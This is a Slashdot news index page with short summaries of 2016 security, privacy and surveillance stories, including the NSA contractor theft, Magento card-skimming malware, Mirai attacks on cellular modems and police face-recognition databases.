Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
United States

Prosecutors Say Contractor Stole 50 Terabytes of NSA Data ( 34

An NSA contractor siphoned off dozens of hard drives' worth of data from government computers over two decades, prosecutors will allege on Friday. From a ZDNet report: The contractor, Harold T. Martin III, is also accused of stealing thousands of highly classified documents, computers, and other storage devices during his tenure at the agency. It's not known exactly what Martin allegedly stole, but a report from The New York Times on Wednesday suggests that the recently-leaked hacking tools used by the agency to conduct surveillance were among the stolen cache of files. Prosecutors will on Friday charge Martin with violating the Espionage Act. If convicted, he could face ten years in prison on each count. The charges, news of which was first reported by The Washington Post, outline a far deeper case than first thought, compared to the felony theft and a lesser misdemeanor charge of removal and retention of classified information revealed in an unsealed indictment last month.
Operating Systems

OMGUbuntu: 'Why Use Linux?' Answered in 3 Short Words ( 235

Linux-focused blog OMGUbuntu's Joey-Elijah Sneddon shared a post today in which he is trying to explain why people should Linux. He stumbled upon the question when he typed "Why use" and Google suggested Linux as one of the most frequent questions. From the article: The question posed is not one that I sincerely ask myself very often. The answer has, over the years, become complicated. It's grown into a bloated ball of elastic bands, each reason stretched around and now reliant on another. But I wanted to answer. Helpfully, my brain began to spit out all the predictable nouns: "Why use Linux? Because of security! Because of control! Because of privacy, community, and a general sense of purpose! Because it's fast! Because it's virus free! Because I'm dang-well used to it now! Because, heck, I can shape it to look like pretty much anything I want it to using themes and widgets and CSS and extensions and blingy little desktop trinkets!"

Your Dynamic IP Address Is Now Protected Personal Data Under EU Law ( 35

Europe's top court has ruled that dynamic IP addresses can constitute "personal data," just like static IP addresses, affording them some protection under EU law against being collected and stored by websites. ArsTechnica UK adds: But the Court of Justice of the European Union (CJEU) also said in its judgment on Wednesday that one legitimate reason for a site operator to store them is "to protect itself against cyberattacks." The case was referred to the CJEU by the German Federal Court of Justice, after an action brought by German Pirate Party politician Patrick Breyer. He asked the courts to grant an injunction to prevent websites that he consults, run by federal German bodies, from collecting and storing his dynamic IP addresses. Breyer's fear is that doing so would allow the German authorities to build up a picture of his interests. Site operators argue that they need to store the data in order to prevent "cybernetic attacks and make it possible to bring criminal proceedings" against those responsible, the CJEU said.

Traditional Keyboard Sounds Can be Decoded By Listening Over a VoIP Connection, Researchers Say ( 55

Reader Trailrunner7 writes: Researchers have known for a long time that acoustic signals from keyboards can be intercepted and used to spy on users, but those attacks rely on grabbing the electronic emanation from the keyboard. New research from the University of California Irvine shows that an attacker, who has not compromised a target's PC, can record the acoustic emanations of a victim's keystrokes and later reconstruct the text of what he typed, simply by listening over a VoIP connection.

The researchers found that when connected to a target user on a Skype call, they could record the audio of the user's keystrokes. With a small amount of knowledge about the victim's typing style and the keyboard he's using, the researchers could accurately get 91.7 percent of keystrokes. The attack does not require any malware on the victim's machine and simply takes advantage of the way that VoIP software acquires acoustic emanations from the machine it's on.


DNA Testing For Jobs May Be On Its Way, Warns Gartner ( 224

Reader dcblogs writes: It is illegal today to use DNA testing for employment, but as science advances its understanding of genes that correlate to certain desirable traits -- such as leadership and intelligence -- business may want this information. People seeking leadership roles in business, or even those in search of funding for a start-up, may volunteer their DNA test results to demonstrate that they have the right aptitude, leadership capabilities and intelligence for the job. This may sound farfetched, but it's possible based on the direction of the science, according to Gartner analysts David Furlonger and Stephen Smith, who presented their research Wednesday at the firm's Symposium IT/xpo in Orlando. This research is called 'maverick' in Gartner parlance, meaning it has a somewhat low probability and is still years out, but its potential is nonetheless worrisome to the authors. It isn't as radical as it seems. Job selection on the basis of certain desirable genetic characteristics is already common in the military and sports. Even without testing, businesses, governments and others may use this understanding about how some characteristics are genetically determined to develop new interview methodologies and testing to help identify candidates predisposed to the traits they desire.

Half of American Adults Are In a Face-Recognition Database ( 63

An anonymous reader quotes a report from Ars Technica: Half of American adults are in a face-recognition database, according to a Georgetown University study released Wednesday. That means there's about 117 million adults in a law enforcement facial-recognition database, the study by Georgetown's Center on Privacy and Technology says. The report (PDF), titled "The Perpetual Line-up: Unregulated Police Face Recognition in America," shows that one-fourth of the nation's law enforcement agencies have access to face-recognition databases, and their use by those agencies is virtually unregulated. Where do the mug shots come from? For starters, about 16 states allow the FBI to use facial recognition to compare faces of suspected criminals to their driver's licenses or ID photos, according to the study. "In this line-up," the study says, "it's not a human that points to the suspect -- it's an algorithm." The study says 26 states or more allow police agencies to "run or request searches" against their databases or driver's licenses and ID photos. This equates to "roughly one in two American adults has their photos searched this way," according to the study. Many local police agencies also insert mug shots of people they arrest into searchable, biometric databases, according to the report. According to the report, researchers obtained documents stating that at least five "major police departments," including those in Chicago, Dallas, and Los Angeles, "either claimed to run real-time face recognition off of street cameras, bought technology that can do so, or expressed an interest in buying it." The Georgetown report's release comes three months after the U.S. Government Accountability Office (GAO) concluded that the FBI has access to as many as 411.9 million images as part of its face-recognition database. The study also mentioned that the police departments have little oversight of their databases and don't audit them for misuse: "Maryland's system, which includes the license photos of over two million residents, was launched in 2011. It has never been audited. The Pinellas Country Sheriff's Office system is almost 15 years old and may be the most frequently used system in the country. When asked if his office audits searches for misuse, Sheriff Bob Gualtieri replied, "No, not really." Despite assurances to Congress, the FBI has not audited use of its face recognition system, either. Only nine of 52 agencies (17%) indicated that they log and audit their officers' face recognition searchers for improper use. Of those, only one agency, the Michigan State Police, provided documentation showing that their audit regime was actually functional."
The Almighty Buck

It's Entirely Reasonable For Police To Swipe a Suspicious Gift Card, Says Court ( 203

An anonymous reader quotes Ars Technica: A U.S. federal appeals court has found that law enforcement can, without a warrant, swipe credit cards and gift cards to reveal the information encoded on the magnetic stripe. It's the third such federal appellate court to reach this conclusion. Last week, the 5th U.S. Circuit Court of Appeals found in favor of the government in United States v. Turner, establishing that it was entirely reasonable for Texas police officers to scan approximately 100 gift cards found in a car that was pulled over at a traffic stop. Like the previous similar 8th Circuit case that Ars covered in June 2016, the defendants challenged the search of the gift cards as being unreasonable. (The second case was from the 3rd Circuit in July 2015, in a case known as U.S. v. Bah.) In this case, after pulling over the car and running the IDs of both men, police found that there was an outstanding warrant for the passenger, Courtland Turner. When Turner was told to get out of the car and was placed in the patrol car, the officer returned to the stopped car and noticed an "opaque plastic bag partially protruding from the front passenger seat," as if someone had tried to push it under the seat to keep it hidden. The cop then asked the driver, Broderick Henderson, what was in the bag. Henderson replied that they had bought gift cards. When the officer then asked if he had receipts for them, Henderson replied that they had "bought the gift cards from another individual who sells them to make money." Turner's lawyers later challenged the scanning, arguing that this "search" of these gift cards went against their client's "reasonable expectation of privacy," an argument that neither the district court nor the appellate court found convincing. The 5th Circuit summarized: "After conferring with other officers about past experiences with stolen gift cards, the officer seized the gift cards as evidence of suspected criminal activity. Henderson was ticketed for failing to display a driver's license and signed an inventory sheet that had an entry for 143 gift cards. Turner was arrested pursuant to his warrant. The officer, without obtaining a search warrant, swiped the gift cards with his in-car computer. Unable to make use of the information shown, the officer turned the gift cards over to the Secret Service. A subsequent scan of the gift cards revealed that at least forty-three were altered, meaning the numbers encoded in the card did not match the numbers printed on the card. The investigating officer also contacted the stores where the gift cards were purchased -- a grocery store and a Walmart in Bryan, Texas provided photos of Henderson and Turner purchasing gift cards."

Hackers Steal Credit Card Data From Visitors of US Senate GOP Committee Website ( 27

pdclarry writes: While all of the recent news has been about hacking the Democratic National Committee, apparently the Republicans have also been hacked over many months (since March 2016). This was not about politics, however; it was to steal credit card numbers. Brian Krebs reports: "a report this past week out of The Netherlands suggests Russian hackers have for the past six months been siphoning credit card data from visitors to the web storefront of the National Republican Senatorial Committee (NRSC). [...] If you purchased a 'Never Hillary' poster or donated funds to the NRSC through its website between March 2016 and the first week of this month [October 2016], there's an excellent chance that your payment card data was siphoned by malware and is now for sale in the cybercrime underground." Krebs says his information comes from Dutch researcher Willem De Groot, co-founder and head of security at Dutch e-commerce site The Republicans were not alone; theirs was just one of 5,900 e-commerce sites hacked by the same Russian actors. You can view De Groot's analysis of the malware planted on the NRSC's site and other services here. Krebs adds: "The NRSC did not respond to multiple requests for comment, but a cached copy of the site's source code from October 5, 2016 indicates the malicious code was on the site at the time (load this link, click 'view source' and then Ctrl-F for '')."

UK Police Begins Deployment of 22,000 Police Body Cameras ( 65

An anonymous reader writes: London's Metropolitan Police Service has begun a roll-out of 22,000 Body Worn Video (BWV) cameras to officers over the city's 32 boroughs after ten years of country-wide trials. The device, which records video only when the officer decides, has a 130-degree field of view and a 30-second buffer which permits police to begin recording even after an event has started. The makers of the camera also provide an Android/iOS app which can allow a remote viewer to connect to an officer's camera, effectively turning police operatives into walking CCTVs. Academic research has suggested that use of BWV cams can reduce complaints against officers by 93%, and the Met contends that the new technology, whose cloud-based systems erases unwanted videos after 31 days, is particularly effective in domestic violence cases.

Journalists Face Jail Time After Reporting on North Dakota Pipeline Protest ( 355

Investigative reporter and co-founder of Democracy Now!, Amy Goodman, is now facing riot charges in the state of North Dakota after her report on a Native American-led pipeline protest there went viral on Facebook. From a TechCrunch report:Democracy Now! issued a statement about the new charges against Goodman late Saturday. Goodman's story, posted to Facebook on September 4th, has been viewed more than 14 million times on the social media platform, Democracy Now! said, and was picked up by mainstream media outlets and networks including CBS, NBC, NPR, CNN, MSNBC and The Huffington Post. Additionally, documentary filmmaker Deia Schlosberg, is facing felony and conspiracy charges that could carry a 45-year sentence for filming at the protest, IndieWire reports.
United Kingdom

UK Security Agencies Unlawfully Collected Data For 17 Years, Court Rules ( 56

British security agencies have secretly and unlawfully collected massive volumes of confidential personal data, including financial information, on citizens for more than a decade, top judges have ruled. The Guardian adds:The investigatory powers tribunal, which is the only court that hears complaints against MI5, MI6 and GCHQ, said the security services operated secret regimes to collect vast amounts of personal communications data, tracking individual phone and web use and large datasets of confidential personal information, without adequate safeguards or supervision for more than 10 years. The ruling said the regime governing the collection of bulk communications data (BCD) -- the who, where, when and what of personal phone and web communications -- failed to comply with article 8 protecting the right to privacy of the European convention of human rights (ECHR) between 1998, when it started, and 4 November 2015, when it was made public. It said the holding of bulk personal datasets (BPD) -- which might include medical and tax records, individual biographical details, commercial and financial activities, communications and travel data -- also failed to comply with article 8 for the decade it was in operation until its public avowal in March 2015.

Assange Internet Link Cut By State Actor, Claims Wikileaks ( 471

An anonymous reader shares a report by RussianToday: WikiLeaks has activated "contingency plans" after its co-founder's internet service was intentionally cut off by a state actor, the media organization said in a tweet. The internet is one of the few, if not only, available ways for Julian Assange, who has been locked up in the Ecuadorian Embassy in London for more than four years, to maintain contact with the outside world. Facing extradition to Sweden over allegations of rape, which he denies, the Australian computer programmer has been holed up in the embassy in West London since 2012. He claims the extradition is actually a bid to move him to a jurisdiction from which he can then be sent to the US, which is known to be actively investigating WikiLeaks. The unverified claims of state sabotage come as WikiLeaks continues to release damaging documents, most recently thousands of hacked emails from Hillary Clinton's campaign manager John Podesta.

The Slashdot Interview With Security Expert Mikko Hypponen: 'Backupception' 38

You asked, he answered!

Mikko Hypponen, Chief Research Officer at security firm F-Secure, has answered a range of your questions. Read on to find his insight on the kind of security awareness training we need, whether anti-virus products are relevant anymore, and whether we have already lost the battle to bad guys. Bonus: his take on whether or not you should take backups of your data.

Google Reveals It Received Secret FBI Subpoena ( 60

An anonymous reader quotes a report from The Intercept: Google revealed Wednesday it had been released from an FBI gag order that came with a secret demand for its customers' personal information. The FBI secret subpoena, known as a national security letter, does not require a court approval. Investigators simply need to clear a low internal bar demonstrating that the information is "relevant to an authorized investigation to protect against international terrorism or clandestine intelligence activities." The national security letter issued to Google was mentioned without fanfare in Google's latest bi-annual transparency report, which includes information on government requests for data the company received from around the world in the first half of 2016. Google received the secret subpoena in first half of 2015, according to the report. An accompanying blog post titled "Building on Surveillance Reform," also identified new countries that made requests -- Algeria, Belarus, and Saudi Arabia among them -- and reveals that Google saw an increase in requests made under the Foreign Intelligence Surveillance Act. But Google in its short blog post did not publish the contents of the actual letter the way other companies, including Yahoo, have done in recent months. Asked about plans to release the national security letter, a Google spokesperson told The Intercept it will release it, though it wouldn't say when or in what form it will do so. Google hasn't previously published any national security letters, though it's possible gag orders for prior demands are still in place. It's also unclear why Google wouldn't immediately publish the document -- unless the gag is only partially lifted, or the company is involved in ongoing litigation to challenge the order, neither of which were cited as reasons for holding it back

Hackers Hit 6,000 Sites On Active 18-Month Carding Spree ( 39

mask.of.sanity writes from a report via The Register: Hackers have installed skimming scripts on more than 6,000 online stores and are adding 85 each day in a wide-scale active operation that may have compromised hundreds of thousands of credit cards. The malware is infecting stores (full list) running vulnerable versions of the Magento ecommerce platform, and also compromised the U.S. National Republican Senatorial Committee store. "Given that there are [about] 5,900 other skimmed stores, and the malpractice has been going on since at least May last year, I would expect the number of stolen cards in the hundreds of thousands," said Dutch developer Willem de Groot. You can read his blog post to learn more.

DHS Warns of Mirai Botnet Threat To Cellular Modems ( 21

chicksdaddy writes from a report via The Security Ledger: The Mirai malware that is behind massive denial of service attacks involving hundreds of thousands of "Internet of Things" devices may also affect cellular modems that connect those devices to the internet, the Department of Homeland Security (DHS) is warning. An alert issued by DHS's Industrial Control System CERT on Wednesday warned that cellular gateways manufactured by Sierra Wireless are vulnerable to compromise by the Mirai malware. While the routers are not actively being targeted by the malware, "unchanged default factory credentials, which are publicly available, could allow the devices to be compromised," ICS-CERT warned. The alert comes after a number of reports identified devices infected with the Mirai malware as the source of massive denial of service attacks against media websites like Krebs on Security and the French hosting company OVH. The attacks emanated from a global network of hundreds of thousands of infected IP-enabled closed circuit video cameras, digital video recorders (DVRs), network video recorders (NVRs) and other devices. Analysis by the firm Imperva found that Mirai is purpose-built to infect Internet of Things devices and enlist them in distributed denial of service (DDoS) attacks. The malware searches broadly for insecure or weakly secured IoT devices that can be remotely accessed and broken into with easily guessed (factory default) usernames and passwords. The report adds: "Sierra said in an alert that the company has 'confirmed reports of the 'Mirai' malware infecting AirLink gateways that are using the default ACEmanager password and are reachable from the public internet.' Sierra Wireless LS300, GX400, GX/ES440, GX/ES450, and RV50 were identified in the bulletin as vulnerable to compromise by Mirai. Furthermore, devices attached to he gateway's local area network may also be vulnerable to infection by the Mirai malware, ICS-CERT warned. Sierra Wireless asked affected users to reboot their gateway. Mirai is memory resident malware, meaning that is erased upon reboot. Furthermore, administrators were advised to change the password to the management interface by logging in locally, or remotely to a vulnerable device."

Yahoo Patents Smart Billboard That Would Deliver Targeted Ads To Passersby or Motorists ( 131

An anonymous reader writes: Yahoo has filed a patent for advertising billboards outfitted with a wide array of sensors -- including drone-based cameras -- which would use facial and vehicle recognition, data brokers, cell-tower information and social network information to attempt to identify worthwhile advertising targets and aim personalized ads at them as they pass on foot or in cars. The scheme, which was submitted on October 6th, anticipates using the same kind of micro-auction processes that currently determine which ads users see in webpages and mobile apps. The implementation of public ad-targeting brings up some fascinating and chilling prospects, as users find that the ads which "bloom" around them betray much about their private lives. Yahoo provides an example via its patent application: "According to one example, a digital billboard adjacent a busy freeway might be instrumented with or located near traffic sensors that detect information about the context of the vehicles approaching the billboard, e.g., the number and average speed of the vehicles. Such information might be used in conjunction with information about the time of day and/or the day of the week (e.g., Monday morning rush hour) to select advertisements for display that would appeal to an expected demographic and to display the advertisements for durations that are commensurate with the level of traffic congestion." The patent application also mentions how it will gather required information from individuals: "Various types of data (e.g., cell tower data, mobile app location data, image data, etc.) can be used to identify specific individuals in an audience in position to view advertising content. Similarly, vehicle navigation/tracking data from vehicles equipped with such systems could be used to identify specific vehicles and/or vehicle owners. Demographic data (e.g., as obtained from a marketing or user database) for the audience can thus be determined for the purpose of, for example, determining whether and/or the degree to which the demographic profile of the audience corresponds to a target demographic."

Senator Wants Nationwide, All-Mail Voting To Counter Election Hacks ( 454

An anonymous reader quotes a report from Ars Technica: In the wake of the Obama administration's announcement that the Russian government directed hacks on the Democratic National Committee and other institutions to influence U.S. elections, a senator from Oregon says the nation should conduct its elections like his home state does: all-mail voting. In an e-mail, Sen. Ron Wyden, a Democrat, told Ars: "We should not underestimate how dangerous... attacks on election systems could be. If a foreign state were to eliminate registration records for a particular group of Americans immediately before an election, they could very likely disenfranchise those Americans and swing the results of an election. Recent efforts by some states to make it more difficult to vote only serves to increase the danger of such attacks. This is why I have proposed taking Oregon's unique vote-by-mail system nationwide to protect our democratic process against foreign and domestic attacks." The only states to hold all elections entirely by mail are Oregon, Washington, and Colorado, according to the National Conference of State Legislatures. More than a dozen others have various provisions for mail voting. The National Conference of State Legislatures has a breakdown here on how Americans cast their votes across the union. Wyden co-sponsored the Vote By Mail Act in July, and he did so for reasons at the time that were unconnected to cybersecurity. Instead, the measure was originally proposed to help minorities and others cast ballots. The plan requires the U.S. Postal Service to deliver ballots to all registered voters. Voters could also register to vote when applying for driver's licenses, too. The measure fell on deaf ears this year and didn't even get a committee vote. A Wyden spokesperson said the proposal will have a "better chance" next year if Democrats win a majority of Senate seats.

US Military Is Looking At Blockchain Technology To Secure Nuclear Weapons ( 62

Lasrick quotes a report from Quartz: Blockchain technology has been slow to gain adoption in non-financial contexts, but it could turn out to have invaluable military applications. DARPA, the storied research unit of the U.S. Department of Defense, is currently funding efforts to find out if blockchains could help secure highly sensitive data, with potential applications for everything from nuclear weapons to military satellites. The report adds: "The case for using a blockchain boils down to a concept in computer security known as 'information integrity.' That's basically being able to track when a system or piece of data has been viewed or modified. In DARPA's case, blockchain tech could offer crucial intelligence on whether a hacker has modified something in a database, or whether they're surveilling a particular military system. This September, DARPA, which stands for Defense Advanced Research Projects Agency (the agency helped create the internet, among other things), awarded a $1.8 million contract to a computer security firm called Galois. The firm's assignment is to formally verify -- a sort of computer-code audit, using mathematics -- a particular type of blockchain tech supplied by a company called Guardtime. Formal verification is one way to build nearly unhackable code, and it's a big part of DARPA's approach to security. If the verification goes well, it could inch DARPA closer to using some form of blockchain technology for the military, DARPA's program manger behind the blockchain effort, Timothy Booher, said. 'We're certainly thinking through a lot of applications,' he says. 'As Galois does its verification work and we understand at a deep level the security properties of this [technology] then I would start to set up a series of meetings [with the rest of the agency] to start that dialog.'"

White House Vows 'Proportional' Response For Russian DNC Hack ( 396

After the Director of National Intelligence and Department of Homeland Security publicly blamed Russia for stealing and publishing archived emails from the Democratic National Committee on Friday, White House Press Secretary Josh Earnest said today that President Obama will consider a "proportional" response. ABC News reports: "We obviously will ensure that a U.S. response is proportional. It is unlikely that our response would be announced in advanced. It's certainly possible that the president could choose response options that we never announce," Earnest told reporters aboard Air Force One. "The president has talked before about the significant capabilities that the U.S. government has to both defend our systems in the United States but also carry out offensive operations in other countries," he added. "There are a range of responses that are available to the president and he will consider a response that's proportional." The Wall Street Journal report mentions several different ways to response to Russia. The U.S. could impose economic sanctions against Moscow, punish Russia diplomatically, opt to allow the Justice Department to simply prosecute the hacks as a criminal case, and/or launch a U.S. cyberattack targeting Russia's election process. Of course, each response has its pros and cons. "They could escalate into a more adversarial conflict between both countries," writes Carol E. Lee for the Wall Street Journal. "But the absence of a response could signal that such behavior will be tolerated in the future."

Slashdot Top Deals